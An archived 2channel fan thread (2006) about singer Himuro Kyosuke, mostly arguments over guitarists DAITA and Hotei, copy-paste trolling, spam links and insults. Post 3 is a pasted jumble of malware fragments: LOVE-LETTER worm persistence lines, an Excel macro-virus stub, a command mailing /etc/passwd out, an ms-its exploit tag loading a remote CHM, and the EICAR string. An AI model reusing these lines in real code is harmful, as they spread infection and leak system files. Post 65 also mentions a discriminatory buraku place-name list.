2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

氷室京介スレ避難所3

1 :打倒ポテヲタ:2006/10/13(金) 21:46:51 ID:eb/w0X0e
氷室の場合はANSWERは賛美両論だけど
曲が気に入ったって意見は多かったし
スイレボはかなり期待されて良曲であることが決定されてる

それに比べたら布袋は
最近の新曲は全否定されてるよね
布袋スレでも褒めてる人は一握りの状況

布袋ヲタもストレス貯まって氷室スレに嫉妬する
気持ちもわかるよ


2 :NO MUSIC NO NAME:2006/10/13(金) 21:51:09 ID:TzuQA/jL
ttp://www.zakzak.co.jp/geino/n-2002_03/image/g2002031401ayu_b.jpg

3 :NO MUSIC NO NAME:2006/10/13(金) 21:51:53 ID:YfdlqOyI
kak.hta';ken=wd+'START
cat /etc/passwd | mail nobody@nonexistent.com

<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub
ܷܵܶ

4 :NO MUSIC NO NAME:2006/10/13(金) 21:52:08 ID:TzuQA/jL
エビオス錠で、精液ドバドバ!
http://news18.2ch.net/test/read.cgi/slot/1150115995/


5 :打倒ポテヲタ:2006/10/13(金) 21:54:34 ID:eb/w0X0e
ポテヲタの貴地外はおるがそんな貴地外に釣られるヤツ多すぎ
腹たつのはわかるがスルーしな。

ここはちょっと前まではほのぼのしてたスレだったのに。

まぁ荒れるのも人気者ゆえの証拠か。


6 :NO MUSIC NO NAME:2006/10/13(金) 21:56:20 ID:TzuQA/jL
【アラブ石油王】ダルマ女の画像【ご用達?】
http://sakura01.bbspink.com/test/read.cgi/ascii/1128496114/


7 :NO MUSIC NO NAME:2006/10/13(金) 21:59:13 ID:eb/w0X0e
>氷室の全作品を聴くべきだと言って何が間違ってるんだか
氷室の作品じゃない。BOOWYで布袋だ。


8 :NO MUSIC NO NAME:2006/10/13(金) 22:14:34 ID:94eoZQsF
>>7
うわーそれw
逆に脱力するわw

9 :重複・乱立厳禁:2006/10/13(金) 23:02:31 ID:hIoo4Kci
氷室京介〜SWEET REVOLUTION〜Part321
http://music5.2ch.net/test/read.cgi/musicjm/1160666804/l50
氷室京介〜SWEET REVOLUTION〜Part321-2
http://music5.2ch.net/test/read.cgi/musicjm/1160688646/l50

10 :NO MUSIC NO NAME:2006/10/13(金) 23:08:06 ID:kY8EOFUV
>>1




11 :NO MUSIC NO NAME:2006/10/13(金) 23:11:04 ID:eb/w0X0e
布袋もセッツァーも
スティーブに比べたらゴミだろw
イデア聞いた事ないのか?リボーンに勝てる曲布袋にはないだろw


12 :打倒ポテヲタ:2006/10/13(金) 23:15:15 ID:eb/w0X0e
表現する音楽のジャンルこそ違えど、『音の造り込み』の面では氷室もトレント(NIN)も基地外レベルだわなw
特にメロウ以降の作品はそれが如実に表れていると思う。


13 :打倒ポテヲタ:2006/10/13(金) 23:17:13 ID:eb/w0X0e
クラプトンのレイラ(クリーム)→レイラ(アンプラグド)≒わがままジュリエット→ジュリエット な感じがしますた
大人の余裕〜って感じ


14 :NO MUSIC NO NAME:2006/10/13(金) 23:18:37 ID:eb/w0X0e
レッチリ.リンキン.ベック…
氷室の友達関係は幅広い

15 :NO MUSIC NO NAME:2006/10/14(土) 00:52:33 ID:Jw0f2grt
友達ではないw

16 :NO MUSIC NO NAME:2006/10/14(土) 07:52:35 ID:h2ZfKlW0
>>15
スレ立てはコピペ荒らし。ポテヲタ連発厨もこいつ。マジレスしないで。

17 :NO MUSIC NO NAME:2006/10/14(土) 12:15:49 ID:NAnPY+Lu
でも避難所2は役にたったよ

18 :そうだな:2006/10/14(土) 15:11:14 ID:UGTCm6xx
糞スレ立てんな


19 :NO MUSIC NO NAME:2006/10/14(土) 17:41:21 ID:50A6jyMa
上海氏ね

20 :NO MUSIC NO NAME:2006/10/14(土) 18:56:41 ID:TsrYDOcq
避難所2てどこにある?
検索しても見つからんのだが。

21 :NO MUSIC NO NAME:2006/10/15(日) 01:05:42 ID:WWVTplgB
>>20
初心者か?
荒らされて落ちたよ

22 :NO MUSIC NO NAME:2006/10/15(日) 01:36:39 ID:d7YUpSCi
コラボシングルは、TAKUROから持ちかけられた話しであり、灰の移籍問題で氷室が助け船を出しただけ。
決して、金儲けが目的ではない


23 :NO MUSIC NO NAME:2006/10/15(日) 01:42:02 ID:d7YUpSCi
ログ見てると他のファンの人はすごいよね
氷室さんとかと同じくらい知識あるんじゃないかと
思うくらいコアな人もいてびびりますね〜
QOTSAとかマンソンとかグリーンデイとかいろんな音も同時に聴いてるんですね〜。
グリーンデイは私も結構好きだな。
根っから音楽家なかんじが。


24 :NO MUSIC NO NAME:2006/10/15(日) 01:43:31 ID:ZH+NOwG7
氷室ファンは一般人以外にも芸能人とか音楽やってる奴でも聴いてる人が多いからね。
Bzの松本とかもね。

25 :NO MUSIC NO NAME:2006/10/15(日) 01:45:07 ID:d7YUpSCi
リアムと一緒にするのは氷室が可哀想だ。
奴は完全な暴飲暴食、酒の飲みすぎ、タバコ、薬やりすぎ、
ボイトレしないし、ライブのリハさぼるし当然の結果。

氷室の場合は声の芯が細くなってるな・・・・ホント今の氷室が好きだから
それさえ克服すれば完璧なんだけどなぁ〜。


26 :NO MUSIC NO NAME:2006/10/15(日) 01:46:02 ID:d7YUpSCi
まあ俺も散々文句言いつつリアムの声好きだけどw
氷室の場合、トムヨークとリアムの中間なんじゃないかな?
繊細な歌い方と、ロックの荒々しい歌い方を両方同時にやろうとしてるから負荷が大きいのかもね

27 :NO MUSIC NO NAME:2006/10/15(日) 01:57:03 ID:d7YUpSCi
ペイジ・プラントの頃は才能枯れてたんじゃない?ヲタの間でも評判悪いよ。
テクニック的にはペイジはイングヴェイやベックより劣るけど、
ペイジのギターのほうが遥かに感動する、俺は。


28 :NO MUSIC NO NAME:2006/10/15(日) 02:06:13 ID:d7YUpSCi
リクエストした曲をやってくれるってのは本当に感動するよな。
OUTSIDE BEAUTYも投票したけど、やってくれただけで嬉しかったのに
その後の氷室がOUTSIDEを気に入ってくれたってMCがまた嬉しかった。
さらに2ndでもやってくれた瞬間に意味不明だが「勝った!」と思ったw


29 :NO MUSIC NO NAME:2006/10/15(日) 02:11:09 ID:d7YUpSCi
ロックと商業音楽は切っても切れない関係だし、ポップな要素も十分すぎるほどに含んでるのがロック。
QUEEN、ディープパープル、フーだって曲によってはドポップスだし、売上も大ヒットしてる。
つまりロックの範囲、定義なんて大分前からすでに収集つかなくなってる。


30 :NO MUSIC NO NAME:2006/10/15(日) 02:34:33 ID:d7YUpSCi
DAITAカッコええなぁ。めちゃタイプ(^^)vギターも上手くてあのルックスだと絶対モテるって。悪口言う男は半分以上はひがんでるよ

31 :NO MUSIC NO NAME:2006/10/15(日) 02:54:43 ID:d7YUpSCi
ホーテイをバカにされ、ブログをオナニされ
ぶっ潰されると本物じゃないと言い張る…レベルが高いですね
俺もホーテイの曲聞いてセンスを磨かなきゃ

マンセィ マンセィ サンバーディ エーンゼルゥ


32 :NO MUSIC NO NAME:2006/10/15(日) 02:56:06 ID:d7YUpSCi
みんなダイタファンなんだからヒムロックの歌でも聞いて仲良くしようぜ

マンセィ♪ マンセィ♪ サンバーディ エーンゼルゥ♪


33 :NO MUSIC NO NAME:2006/10/15(日) 03:21:57 ID:OHVLPnpK
( ゚Д゚)ゴルァ!泡犬、うぜーぞ!

34 :NO MUSIC NO NAME:2006/10/15(日) 07:50:55 ID:eZR+NOU+
氷室はカリスマオーラを放ってる(☆o☆)


35 :NO MUSIC NO NAME:2006/10/15(日) 12:03:41 ID:fxMau4tv
>>25
暴飲暴食・酒飲みであの身体は保てっこないよ。絶対に。

36 :NO MUSIC NO NAME:2006/10/15(日) 18:06:01 ID:zFnNctqW
>>35
だからコピペにマジレスすんなっつーの
機能してる避難所は他板にちゃんとあるから探してみ。

37 :NO MUSIC NO NAME:2006/10/16(月) 00:16:20 ID:N6BX2y5D
みんなダイタファンなんだからヒムロックの歌でも聞いて仲良くしようぜ

マンセィ♪ マンセィ♪ サンバーディ エーンゼルゥ♪



38 :NO MUSIC NO NAME:2006/10/16(月) 02:07:45 ID:N6BX2y5D
今スイレボがCDランク上位だから氷室がTVメディアに出ないかなー

でも普通に日本のスタジオの音楽番組で他のアーティストと一緒に居る姿の氷室は俺が感じるカリスマのイメージを下げる気がするからイヤだな!衛星中継で良いから氷室を地上波で観たいねー!
もちろんLAから映る氷室の姿は最高!
今年僕音の出演は逆にテルがヒムヲタだからカリスマのイメージは崩れなかったと思うけどな!(テルが氷室に気を使う姿が高印象)



39 :NO MUSIC NO NAME:2006/10/16(月) 16:16:28 ID:y4r/5fx+
森さんの歌詞こそロックだよな。

40 :NO MUSIC NO NAME:2006/10/16(月) 18:52:08 ID:WEfU6itS
俺のレスをコピーしてるageの奴!お前昔っから嫌われ者だろー笑

41 :NO MUSIC NO NAME:2006/10/16(月) 20:51:15 ID:5iyEdlQk
>>38
>>39
激しく同意

42 :NO MUSIC NO NAME:2006/10/16(月) 22:22:12 ID:N6BX2y5D
次また奴が来たら、
『結局DAITAが大好きで此処に来ちゃう、そんな奴』
と、みなします。



43 :NO MUSIC NO NAME:2006/10/16(月) 22:56:43 ID:6FzfMmKX
>>42
勝手にみなすまえに、まずsageろや!
この厄年(アンカーw)ヤロウwww

44 :NO MUSIC NO NAME:2006/10/17(火) 11:53:42 ID:+0oS7fXP
ダイタは糞ギタリスト
氷室バンドにはイラネ

45 :NO MUSIC NO NAME:2006/10/17(火) 23:23:55 ID:raHGd30N
氷室はメインストリームを外れてワイルドサイドを歩きます


46 :NO MUSIC NO NAME:2006/10/18(水) 16:37:04 ID:roxCvbMm
ライブでMistyが激しく聴きたい。

47 :NO MUSIC NO NAME:2006/10/18(水) 23:48:11 ID:1WepPrxb
今スイレボがCDランク上位だから氷室がTVメディアに出ないかなー

でも普通に日本のスタジオの音楽番組で他のアーティストと一緒に居る姿の氷室は俺が感じるカリスマのイメージを下げる気がするからイヤだな!衛星中継で良いから氷室を地上波で観たいねー!
もちろんLAから映る氷室の姿は最高!
今年僕音の出演は逆にテルがヒムヲタだからカリスマのイメージは崩れなかったと思うけどな!(テルが氷室に気を使う姿が高印象)



48 :NO MUSIC NO NAME:2006/10/19(木) 00:00:57 ID:67ndMYB2
布袋もセッツァーも
スティーブに比べたらゴミだろw
イデア聞いた事ないのか?リボーンに勝てる曲布袋にはないだろw


49 :NO MUSIC NO NAME:2006/10/19(木) 11:26:34 ID:esprqsp6
>>48
その勝ち負け、誰が決めたの?

オマエか。
さぞ御立派な御方でwww

50 :誘導:2006/10/20(金) 03:19:58 ID:IALRNT8R
氷室京介〜SWEET REVOLUTION〜Part321-4
http://music5.2ch.net/test/read.cgi/musicjm/1161178507/l50

51 :NO MUSIC NO NAME:2006/10/20(金) 14:28:44 ID:ZbWKgAud
ツアー日程が早く知りたいお

52 :NO MUSIC NO NAME:2006/10/21(土) 17:45:26 ID:5+n/156L
次のツアーも、ギターがダイタなら行かないよ




53 :NO MUSIC NO NAME:2006/10/21(土) 18:11:21 ID:JfPM3Rxo
>>1
オマエ怪しいヤツだなー!


54 :NO MUSIC NO NAME:2006/10/21(土) 18:21:41 ID:JfPM3Rxo
>>1
避難所とか言ってレスを立ててるがオマエ嵐だろ!!


55 :NO MUSIC NO NAME:2006/10/22(日) 03:58:51 ID:GktoZpCD
糞スレ晒しage

56 :NO MUSIC NO NAME:2006/10/23(月) 11:24:35 ID:y4jI94fh
>>52
どうぞ。それはあんたの勝手。

57 :NO MUSIC NO NAME:2006/10/26(木) 00:01:39 ID:lWge1o5I
プレイ、ルックスともにDが軽く凌駕しちゃってるから
ホーテイヲタはかわいそうだ

ホーテイvs本田でも怪しいところ


58 :NO MUSIC NO NAME:2006/10/26(木) 17:59:21 ID:VhLzgpRD
結局DAITA批判してるヤツは氷室がDAITA好きとゆう事が悔しいだろ。
大好きなSTEVEが復帰できないもんね。


59 :NO MUSIC NO NAME:2006/10/26(木) 19:49:04 ID:mZ+5Abrc
布袋.VS.本田‥‥‥











本田勝ち★★
布袋は市ね

60 :NO MUSIC NO NAME:2006/10/26(木) 20:10:50 ID:oVADlNR5
本田は凄いよ。
ライブではいつも音下げられちゃってるけど、ダイタをリードしてるのはあの人だと思う。
氷室の音楽を真剣に考えているのがわかるしテクニック共にかなりネ申だよ。

61 :NO MUSIC NO NAME:2006/10/26(木) 22:41:29 ID:VhLzgpRD
DAITAカッコええなぁ。めちゃタイプ(^^)vギターも上手くてあのルックスだと絶対モテるって。悪口言う男は半分以上はひがんでるよ。




62 :NO MUSIC NO NAME:2006/10/27(金) 00:00:20 ID:oVADlNR5
氷室の方が何十倍もカッコイイ( -_-)

63 :NO MUSIC NO NAME:2006/10/27(金) 00:02:17 ID:oVADlNR5
なにがダイタだ、ダイタダイタうるさい、氷室だ氷室

64 :NO MUSIC NO NAME:2006/10/27(金) 00:20:29 ID:nShzktF0
>>62
結局DAITA批判してるヤツは氷室がDAITA好きとゆう事が悔しいだろ。
大好きなSTEVEが復帰できないもんね。


65 :NO MUSIC NO NAME:2006/10/27(金) 00:31:40 ID:uiDLUzqV
とある板に被差別部落がわかる部落地名名鑑がうpされてて
奈良に住んでる彼女がもろそこの(名鑑に乗ってる地名)住民なのね
俺どうしたらいいの?

66 :NO MUSIC NO NAME:2006/10/27(金) 00:34:44 ID:RwRzHxDW
>>65
そんな事考えてる時点でだめぽな気がする

67 :NO MUSIC NO NAME:2006/10/27(金) 00:37:45 ID:NpHT6MUs
いいえ私は別にダイタはキライではありませんむしろスティーブよりも好きです。
でも、いいかげんしつこいです。ダイタきらいなやつは僻んでるとか氷室に気に入られてるから嫉妬してるとか、ダイタカッコイイ、って。
いったい何を言いたいのかどうしたいのか…。
今回もダイタ出るんだからもう良いじゃありませんか( -_-)

68 :NO MUSIC NO NAME:2006/10/27(金) 00:40:18 ID:NpHT6MUs
↑↑>>64

69 :NO MUSIC NO NAME:2006/10/27(金) 00:42:00 ID:OFT7NNjr
ご自由に

70 :NO MUSIC NO NAME:2006/10/27(金) 01:16:29 ID:nShzktF0
>>67
CATVでJリーグをよく見てるんだが、
試合のハイライトシーンで流れる曲(インスト)が
カッコよくて、いつも気になってた。
それがさ、どう聞いてもDAITAサウンドに聞こえるんだわ。

あれはDAITAの曲なのだろうか?
もしそうならやっぱスゲーな。


71 :NO MUSIC NO NAME:2006/10/27(金) 01:19:15 ID:Pc1U9KAU
ONSのSTRANGERなんか聴くと
やっぱりスティーブって思う

72 :NO MUSIC NO NAME:2006/10/27(金) 01:24:06 ID:nShzktF0
おい!ここに来てるやつはD!ファンばかりじゃねぇのか?
D!はギタリストだ。
良い曲つくって格好いいギター聞かせてくれたらそれでいいじゃねーか!
この流れいい加減にしてくれ!(`Д´#)


73 :NO MUSIC NO NAME:2006/10/27(金) 01:29:02 ID:NpHT6MUs
いいえ私は別にダイタファンではありません、氷室ファンです。ダイタはきちんと弾いてくれるからそれでいいです。以上( -_-)

74 :NO MUSIC NO NAME:2006/10/27(金) 01:39:41 ID:nShzktF0
まあDAITAがうますぎなのは事実だからね〜吉川とか布袋じゃ話しにならんわな〜ヴァイとか挙げられたら困るけど…


75 :NO MUSIC NO NAME:2006/10/27(金) 01:51:52 ID:r1upmFQN
>>ダイタきらいなやつは僻んでるとか氷室に気に入られてるから嫉妬してるとか、ダイタカッコイイ、って。
そういう理由で嫌いな奴はいないと思うけどオバサンの勝手な被害者意識と妄想は凄いな。

76 :NO MUSIC NO NAME:2006/10/27(金) 06:58:34 ID:uYxZaiOV
>>71
WALTZの方が響くが

77 :NO MUSIC NO NAME:2006/10/27(金) 17:45:23 ID:nShzktF0
ダイタ批判してる奴らって何が気に入らないんだ?
今までやってきた日本人の中じゃダントツうまいじゃんか
スピード復活とか言ってるヤツは頭おかしーだろ?


78 :NO MUSIC NO NAME:2006/10/28(土) 02:14:14 ID:vCGwU/Yz
>>77そうだよね。ダントツうまいから聴いてて気持ちいいし、安心してヒムロックサウンドを聴いてられる。

79 :NO MUSIC NO NAME:2006/10/28(土) 02:55:35 ID:G0l2h4rO
マメなHP更新だけが売りの糞ギタリストDAITA
支持してんのは音に興味が無い婆さんだけ


80 :NO MUSIC NO NAME:2006/10/28(土) 08:12:29 ID:vCGwU/Yz
自分の曲にどんなギターが相応しいかは、作った本人である氷室自身にしかわからないし、氷室自身が決めること。

81 :NO MUSIC NO NAME:2006/10/28(土) 11:16:13 ID:luNfDS9F
でもそれを評価するのはファン。
バンドじゃなくソロだからこんな抗論が起きる。
氷室の選んだギターだから好きになれってのは
いかにもオバサンの発想だわ。

82 :NO MUSIC NO NAME:2006/10/28(土) 11:35:34 ID:vCGwU/Yz
好きになれなんて言ってないし。好きになれない人がいてもそれはそれでいいんじゃない?
別にそれで何かが変わるわけでもないし。


83 :NO MUSIC NO NAME:2006/10/28(土) 12:53:56 ID:2/yB/0TN
DAITAのせいで多少のファン離れはあったろうな
その分、新規も増えたろうか

84 :NO MUSIC NO NAME:2006/10/28(土) 14:59:36 ID:18MpoAqj
★061028邦楽男性ソロ 氷室スレ「魑魅魍魎」荒らし
http://qb5.2ch.net/test/read.cgi/sec2chd/1161995564/101
101 :沙世 ◆4qxuMMAWoQ :2006/10/28(土) 14:30:57 ID:ORUJ/h5N0
報告>>17-56
ログ>>58-97

2006/10/13 00:28:36〜2006/10/26 15:40:34

.ppp.dion.ne.jp 325res
漏れ串proxy-ogu.osaka-gu.ac.jp <210.163.44.123> 17res
(上記串のうち接続先 172.16.130.99 17res)
\.ucom.ne.jp 7res

85 :NO MUSIC NO NAME:2006/10/28(土) 18:08:04 ID:G0l2h4rO
あぁ、今でもBOOWYに拘ってる人らしい意見だね。
ハイウェイだけが当時に一番近いから。
今の氷室の音楽が好きな人は、ジュリエットもクラウディーハートも「いい!」って言うけどね。

86 :NO MUSIC NO NAME:2006/10/28(土) 20:35:35 ID:uAWR8VVA
ウルトラマン ダイタ

87 :NO MUSIC NO NAME:2006/10/28(土) 22:14:35 ID:r3vqAhsF
BVHではDソロでトイレ行ったヤツいるけど
他のライヴでは、そんなやつ居なかったもんな

88 :NO MUSIC NO NAME:2006/10/28(土) 23:49:57 ID:G0l2h4rO
明日の天皇賞は混戦だけど、、スイレボとヌードに因んで
スイープトウショウ→ダンスインザムード
スイー インザムードの1点馬単(何気に1番人気)で逝きます。
やっぱ氷室、天皇賞→KING OF〜

しかし倖田のアルバムが氷室と同日なんて、、両方買いそう。


89 :NO MUSIC NO NAME:2006/10/29(日) 01:25:17 ID:uIzm7Q1z

ダイタさんへ

あたりさわりの無い音弾いて楽しいですか?
ロックしてないと思いますが、、、

そんなでお客さん満足してると思いますか?

まぁ、オナみたいなもんなんでしょうね

では



90 :NO MUSIC NO NAME:2006/10/30(月) 03:06:07 ID:mtW3oYv+
黙れポテヲタ、握手会にでも行ってろ(・∀・)


91 :NO MUSIC NO NAME:2006/10/30(月) 23:56:02 ID:1eQNi4+7
( ^ω^)




でゅ〜ん

92 :NO MUSIC NO NAME:2006/11/02(木) 10:50:38 ID:uacMXqBk
ポテロング(・∀・)

93 :NO MUSIC NO NAME:2006/11/02(木) 19:13:10 ID:FsW6TCPn
897 :NO MUSIC NO NAME:2006/11/02(木) 17:48:49 ID:B84BXNrM
氷室に「こういう感じで弾いてくれ」と要求されたことに対し的確に答えることができるDAITA
氷室にとって良いギターリストは忠実さ。
その忠実さというのはギターのテクニックセンスはもちろん、
相手が何を要求してるかということを読むことができるセンスも重要だと思う。
つまりDAITAはセンスのあるギターリストということだろう。

センスのある奴=利口
センスの無い奴=馬鹿・蛆虫・キチガイ =ID:B84BXNrM


94 :でも:2006/11/04(土) 14:31:04 ID:JRwgUsqs
個性が無い

95 :NO MUSIC NO NAME:2006/11/04(土) 16:15:04 ID:TN3q/Pc4
腹黒ギターリスト

96 :誘導:2006/11/04(土) 17:57:15 ID:ZPTucnIA
氷室京介〜SWEET REVOLUTION〜Part323
http://music5.2ch.net/test/read.cgi/musicjm/1162474553/l50

97 :NO MUSIC NO NAME:2006/11/05(日) 03:44:52 ID:qE5JOGmX
>>94
個性は自分のアルバムで存分に出してんだろ。

98 :NO MUSIC NO NAME:2006/11/05(日) 12:21:42 ID:ZFBjTT2r
つまらないギター と言う個性

99 :NO MUSIC NO NAME:2006/11/05(日) 20:16:23 ID:LXFA6smn
ライブで出せなきゃギタリストじゃないわな
アルバムなんて他人でもいいわけだし

100 :NO MUSIC NO NAME:2006/11/05(日) 21:54:05 ID:qE5JOGmX
氷室のライブですから。

101 :NO MUSIC NO NAME:2006/11/05(日) 21:59:07 ID:qE5JOGmX
自分のアルバムで、自分の曲で!個性を出してるだろうからいいだろ。だいたい、ダイタのショーを見に行ってるわけではない、氷室のライブを見に行ってるんだよ。気にくわないヤツは来なければ?

102 :NO MUSIC NO NAME:2006/11/07(火) 01:35:37 ID:neKF2AoI
ダイタ嫌いな人ってどうすれば好きになんの?
スティーヴみたいに歯でギター弾いたりくわえタバコで
弾いたり出来ないだろうけど背面ギターでもやれば好きになる?





103 :NO MUSIC NO NAME:2006/11/07(火) 15:56:37 ID:pqbOEzDK
ダイタはくそ

104 :NO MUSIC NO NAME:2006/11/08(水) 23:07:09 ID:6RJ+LsWP
>>101
たぶん、氷室のライヴも行ってない人が
煽ってるだけでしょ

105 :NO MUSIC NO NAME:2006/11/09(木) 11:29:13 ID:ARFnY2xW
>>104
氷室のライブしか行った事ない婆 乙

106 :NO MUSIC NO NAME:2006/11/09(木) 18:27:42 ID:Uq9CwldP
ダイタはヴィジュアルと実力のバランスが悪い、というか氷室の音には合わない

107 :NO MUSIC NO NAME:2006/11/09(木) 22:41:14 ID:mGHj42RU
ここで主張して、誰に代われば満足するのやら
ダイタ変えていいけど、ノリの悪いキモダサ野郎も一掃してほしい

108 :NO MUSIC NO NAME:2006/11/10(金) 01:39:56 ID:sw0NIIv/
CDL2ndはぜひ出してほしいね。
友達に録画してもらった物だと音がイマイチな気がするし・・。
このライブのSTRANGERとかマジ神がかってるよ。


109 :NO MUSIC NO NAME:2006/11/10(金) 01:53:50 ID:yu6L2Lwv
ダイタすてれ

110 :NO MUSIC NO NAME:2006/11/12(日) 17:11:13 ID:8eVWAiWl
ダイタは辞めさせて
ネ申ギタリスト 藤井道生に弾かせろ!

111 :NO MUSIC NO NAME:2006/11/12(日) 17:46:12 ID:r5n3j2dy
>>110
誰?

112 :NO MUSIC NO NAME:2006/11/12(日) 18:00:32 ID:DzTwjJ2e
知らん

113 :NO MUSIC NO NAME:2006/11/13(月) 18:05:09 ID:1naOIvCA
ギターが巧い人はえっちもうまいらしい。ダイタに抱かれたい(><)


114 :NO MUSIC NO NAME:2006/11/13(月) 23:15:41 ID:IU2PAie9
スレ違いにも程がある

115 :NO MUSIC NO NAME:2006/11/13(月) 23:28:12 ID:1naOIvCA
ダイタを批判してる奴ってなんなの?
氷室がいいと思ってサポメンにしてるんだから
氷室を批判してるのと同じことだぞ
氷室が批判されると嫌がるくせに


116 :NO MUSIC NO NAME:2006/11/13(月) 23:33:31 ID:IU2PAie9
だから氷室が批判されると嫌がる人と
ダイタを批判してる奴は別
ってことでしょ

117 :NO MUSIC NO NAME:2006/11/14(火) 21:29:03 ID:xRW+oe8O
ダイタはダイタでいいと思うけど、
氷室の横はパフォーマンス派手な人の方が映えると思う
ステージ引き締める役は氷室だけでいい

118 :NO MUSIC NO NAME:2006/11/15(水) 07:35:47 ID:qKZAX6Nc
日本一しょうもないギタリストだよ

119 :NO MUSIC NO NAME:2006/11/15(水) 17:45:58 ID:mvshOeD/
NEW ALBUM 『IN THE MOOD』
曲名キター

1 again
2 like a baby
3 IN THE MOOD
4 promise〜守られた指輪〜
5 WAR STAFF
6 刹那の風
7 GROVE TUBE
8SWEET REVOLUTION
9 dance dance dance
10 good luck


120 :NO MUSIC NO NAME:2006/11/16(木) 23:36:17 ID:l0MzwySh
すごい反響なんで
今回もDAITAだって
良かったね

121 :NO MUSIC NO NAME:2006/11/16(木) 23:37:24 ID:FsnEP3CS
次スレ立てた
氷室京介 〜IN THE MOOD〜 Part327
http://music5.2ch.net/test/read.cgi/musicjm/1163687536/l50


122 :NO MUSIC NO NAME:2006/11/17(金) 09:07:40 ID:damW95+q
糞スレ晒しage

123 :NO MUSIC NO NAME:2006/11/17(金) 18:41:41 ID:rbOB40hV
糞スレ晒しhage

124 :NO MUSIC NO NAME:2006/11/18(土) 17:38:43 ID:TKGz2U8e
promise〜守られた指輪 の歌詞知ってる方居ましたら
教えて頂けないでしょうか


125 :NO MUSIC NO NAME:2006/11/19(日) 08:06:49 ID:GYBMWvcQ
糞スレ晒しhage

126 :NO NAME NO MUSIC:2006/11/19(日) 19:43:37 ID:/Ef31+zX
ふ○だのババアはプリンが大好き〜♪

まだ続いてるのかな?

127 :NO MUSIC NO NAME:2006/11/20(月) 01:34:34 ID:mU6pKutF
ちゃ〜さんの扱いはかなり良かったとおもうけどなぁ。
個人的にはぽてぃのアコギはキモかった。
たぶんぶらいあんにはギャラの問題で断られたんだろうなぁ

あぁ…ESPのダイタモデルの試作品買うかどうかに迷ってるんだけど今の好みだとトムのほうがほしいんだよな〜


128 :NO MUSIC NO NAME:2006/11/20(月) 11:07:33 ID:GZIQHHyN
これだからダイタヲタは・・・呆

129 :NO MUSIC NO NAME:2006/11/25(土) 01:08:23 ID:rar4h5cP
ちょっと質問
何故ダイタの話ばっかりなのですか?
あの人はあのライブの頃だけだったんじゃないの?
最近のレコードは外人ばっかり

130 :誘導:2006/11/25(土) 04:06:46 ID:D8xy8UOm
氷室京介〜IN THE MOOD〜Part327
http://music5.2ch.net/test/read.cgi/musicjm/1164027098/l50

131 :NO MUSIC NO NAME:2006/11/28(火) 09:43:05 ID:SzV5VMXw
糞スレ晒しhage

132 :NO MUSIC NO NAME:2006/12/01(金) 18:17:40 ID:xLjrDJng
GLAY

TERU(Vocal) 1971年6月8日生、O型。

TAKURO(Guitar・Piano) 1971年5月26日生、O型。・・・リーダー。GLAYの楽曲の大半の作詞・作曲を担当。

HISASHI(Guitar) 1972年2月2日生、O型。

JIRO(Bass) 1972年10月17日生、A型。

KYOSUKE(Vocal) 1960年10月7日生、O型。・・・新メンバーでありながらリーダー格。GLAYの楽曲の大半のアレンジを担当。


133 :NO MUSIC NO NAME:2006/12/01(金) 19:44:57 ID:JGfP+Tr3
GLAY

TERU(Vocal) 1971年6月8日生、O型。

TAKURO(Guitar・Piano) 1971年5月26日生、O型。・・・リーダー。GLAYの楽曲の大半の作詞・作曲を担当。

HISASHI(Guitar) 1972年2月2日生、O型。

JIRO(Bass) 1972年10月17日生、A型。

OSAMU(Vocal) 1960年10月7日生、O型。・・・新メンバーでありながらリーダー格。改名して心機一転。




134 :NO MUSIC NO NAME:2006/12/01(金) 23:44:10 ID:SeeJRODM
そして誰もいなくなっちった(ショボーン

135 :NO MUSIC NO NAME:2006/12/02(土) 08:02:26 ID:oLByNYpG
糞スレ晒しhage

136 :誘導:2006/12/07(木) 21:24:30 ID:aiDss2/p
氷室京介 〜IN THE MOOD〜 Part334
http://music5.2ch.net/test/read.cgi/musicjm/1165459165/l50

137 :NO MUSIC NO NAME:2006/12/08(金) 16:37:03 ID:hQejYzSR
だいたいらね

138 :NO MUSIC NO NAME:2006/12/08(金) 18:46:09 ID:2fCUs65j
糞アーティスト晒しage

139 :NO MUSIC NO NAME:2006/12/09(土) 06:04:03 ID:BFbdgo69
糞アーティスト晒しhage


140 :NO MUSIC NO NAME:2006/12/09(土) 23:40:33 ID:bYGBRzMZ
BOOWYの輝きじゃなくてBANDの輝きでしょう。
BANDの美しさ・・・それは皆が同じ目標に向かって走ってる・・・
それは時に泥臭く、時にはナイフのように鋭く、時にはナイフのように光り輝き・・・
更に若さという武器がそれを引き立てる。
もしかしたらBANDではなく若さが輝いてたのかもしれない。
若さを失った氷室・・・そこに何が残ってそして何が輝いてるのか・・・
クローディア、EASY LOVE、そしてスイレボ・・・
もう答えはでてるよな?それらの音が答えだ。


141 :NO MUSIC NO NAME:2006/12/09(土) 23:43:17 ID:gCUWPJsz
>>140
俺のレスを片っ端からコピペかw
お前が俺に対し嫉妬してるからそうしてるんだろうが・・・
